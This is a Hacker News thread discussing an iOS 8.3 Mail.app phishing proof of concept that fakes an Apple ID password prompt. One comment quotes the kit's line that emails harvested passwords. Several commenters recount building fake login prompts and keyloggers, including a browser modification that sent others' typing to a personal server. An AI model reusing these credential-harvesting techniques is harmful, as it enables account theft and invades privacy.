
iOS 8.3 Mail.app inject kit - diafygi
https://github.com/jansoucek/iOS-Mail.app-inject-kit/tree/master
======
thomasfoster96
I've always been a little worried when using iOS8 because the popup to input
usernames/passwords/passcodes looked very poorly designed by Apple's standards
- there's an odd border around some very square text inputs, and the
placeholder text is misaligned and not capitalised properly.

If I were more paranoid about the security of my phone I probably wouldn't
have used these inputs because they seem a lot like a phishing attack - but I
risked it and assumed it's just a bug or lazy reviewer at Apple.

~~~
kalleboo
I've also always been worried about that dialog since it pops up at the most
random times, when some background iCloud connection fails or whatever and it
guesses that it's an authentication issue rather than a network one. I've seen
it show up on the homescreen, Safari, etc. I'm sure users are way too
desensitized to those dialogs now.

They should at the very least bounce you to Settings.app instead of showing
the dialog inside whatever app you're using.

~~~
joshstrange
This 10000X over! I try to never enter my password into those prompts unless I
know what caused it to pop. Apple has failed MASSIVELY by popping it all the
time for any number of things. They need to explain better WHY they need it
again because every time I see it I know it could be a fake one or one being
used to just harvest my PW instead of log me into anything.

------
elwell
Oh, this stuff is fun. In high school, I made a WScript that prompted the user
"Network timed out on line #6. Please re-enter password:" and would
surreptitiously record it. I put this on a floppy, popped it in when someone
in the library went to the printer, waited, came back and said, "sorry, forgot
my floppy; can I get it, excuse me". Didn't use it maliciously; usually would
just modify the folder settings on their home drive on the network to have
repeating images of Pokemon as a background image. I suppose this all sounds
quite devious in writing.

~~~
pavlov
I also made a password logger in high school (like presumably a great many
bored kids). The network was all DOS machines where you used a command line
tool to manually log in to a Novell server. There was no security in that
system, so I wrote a simple wrapper that looked like the Novell login tool,
saved the passwords and then shelled out to the real thing to provide access.

I didn't use the passwords for anything... But there was a guy in another
class whose password was the name of the girl on whom I had a crush too.
Illicit knowledge bred jealousy! Neither of us ever got the girl.

~~~
gauravphoenix
Are you me?

I did the very same thing ~20 years ago. I used DOS Terminate and Stay
Resident (TSR) code to achieve this; I didn't have to fake any screen. The
keystrokes were stored in a file.

I still remember the keyboard interrupt value (0x9) while registering TSR code.

~~~
PiRX
Was it with a Novell network? 'cuz I remember their login being paranoid and
starting to emit beeps with a TSR hooked on the keyboard interrupt. Or maybe it
was just sloppy coding from 12-year-old me :)

------
diafygi
The demo video is pretty convincing.

[https://youtube.com/watch?v=9wiMG-oqKf0](https://youtube.com/watch?v=9wiMG-oqKf0)

~~~
Ciantic
Yes, this is pretty bad for Apple, I wonder if they find a way to extort this
poor man to remove it.

I also liked the fact YouTube started to play "New iOS 8 Mail App: Here's Why
It Is Impressive!" video automatically after that video.

~~~
caryhartline
Apple and other companies have had plenty worse vulnerabilities for their
operating systems exposed and there is not any evidence that extortion took
place afterwards for someone to go quiet.

------
pasta_2
Did this guy e-mail Apple product security?

[https://www.apple.com/support/security/](https://www.apple.com/support/security/)

~~~
kranner
Apparently filed a Radar report on Jan 15, 2015.

~~~
TsukasaUjiie
And every time it's tested:

mail('product-security@apple.com','Apple ID Password',"Thanks for your
password! \n $data ¯\\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit"); [1]

[1]: [https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...](https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/master/framework.php#L11)

~~~
imrehg
Smart and cheeky at the same time, like it!

------
nodesocket
Wouldn't one fix be for native modals (not created by web) to have a
distinguishing feature? For example, native modal backgrounds could use your
home screen background with a reduced opacity and blur. This could mitigate
these types of phishing attacks since emulating the look and feel in web
(html/css) would be difficult.

~~~
wingerlang
There's a thing in scam popups and emails - they are left not-perfect so that
they can weed out the easier targets. I'm not sure if it is 100% applicable on
this situation, but maybe there's something to it.

------
yAnonymous
"We care about security - but only when there's a public exploit." - Apple

------
darkhorn
In the university's computer labs I modified Firefox. It injected JavaScript
at the header. This JS was sending everything typed in Firefox to my server.
It was nice to read other people's conversations (only the one side of
course). Normally most computers' BIOS was password protected. These ones were
left without BIOS protection, so I was able to run Linux from a USB drive and
modify the Program Files folder in C:\

------
Geee
I think a good idea would be to include a personal image in the popups, for
example the user's profile image.

------
comex
Interesting bug, but I'd call the title a bit of an exaggeration. The mail app
doesn't 'allow' harvesting Apple IDs, it allows unexpected content to be
displayed in emails, and the author shows a proof of concept of using that for
relatively convincing phishing.

~~~
anilgulecha
You may not fall for this -- but a good section of non-technical people would.
Harvesting is not an exaggeration.

~~~
comex
A good section of non-technical people would fall for the same thing if
presented from any random website in Safari (especially with iOS's
predilection towards random password popups from background processes...). Not
trying to downplay the issue, just provide some perspective.

~~~
JohnTHaller
One big difference is that by tying it to the email client, you're already
showing the target's email address pre-filled, just like the legit prompt
would. Plus, you can specifically target an individual and show the prompt
without needing to convince them to visit a webpage first.

------
baidoct
Well, lucky me, I don't use the Mail app. I'm using the Gmail app.

------
skrowl
Apple security really is the laughing stock of the info security world these
days.

First the SMS of doom that could crash any iOS or Mac device, now this.
Seriously though, thanks for the fappening!

~~~
caryhartline
If all you need are those two vulnerabilities to be a laughing stock of the
security world then would not every operating system and major piece of
software fit that bill?

